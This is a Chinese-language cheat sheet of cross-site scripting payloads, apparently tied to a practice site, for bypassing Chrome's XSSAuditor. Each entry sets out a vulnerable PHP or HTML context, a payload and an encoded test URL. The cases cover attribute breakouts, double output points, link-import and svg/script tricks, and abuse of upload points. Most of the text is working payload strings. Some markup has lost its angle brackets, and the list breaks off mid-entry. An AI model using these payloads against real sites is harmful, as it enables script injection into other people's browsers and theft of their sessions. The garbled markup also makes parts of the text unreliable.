test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO--JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
输出在属性中,并且后面还有的情况
context:
img alt="">
script> y = "abc"; script>
payload
{gfm-js-extract-pre-1}
test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22
双输出点的情况
context:
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."
";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."
";
?>
payload:
http://xxx/chrome.php?text1=script>alert(/XSS/);void('&text2=')script>
http://xxx/chrome.php?text1=script>alert(/XSS/);document.write('&text2=')script>
test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
大概-06-23以前的版本均可。
context = 全部情况
payload:
xss=svg>script>/1/>alert(document.domain)script>svg>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
Chrome 36~40 link 导入html导致bypass
Fixed on Oct 10, .(实际上初还存在)
/p/chromium/issues/detail?id=421166
/bugs/wooyun--090304
由于link导入外部html导致XSSAuditor绕过。
context = 全部情况
payload
xss=link rel=import href=https://auth.mhz.pw/game/xss/link.php>
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E
输出在script内字符串位置的情况
如果允许闭合字符串,直接闭合并写入javascript即可,如:
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
但如果不能闭合单引号呢?如这个context
html>
head>
meta charset="utf-8">
title>alltitle>
script type="text/javascript">
var a = 'php echo addslashes($_GET["xss"]); ?>';
script>
head>
body>
123
body>
html>
payload
script>
x = "script>svg>script>alert(1)+"";
script>
x = "script>svg>script>alert(1)+'";
test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
有可控上传点的通用Bypass
context:
网站域名下有可控的上传点,我可以上传一个.txt或.js等文件(只要不是媒体文件,其他文件均可,比如上传是黑名单验证的,可以随便写个后缀)。再引入script标签的src属性即可。
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
$_GET['x'])?>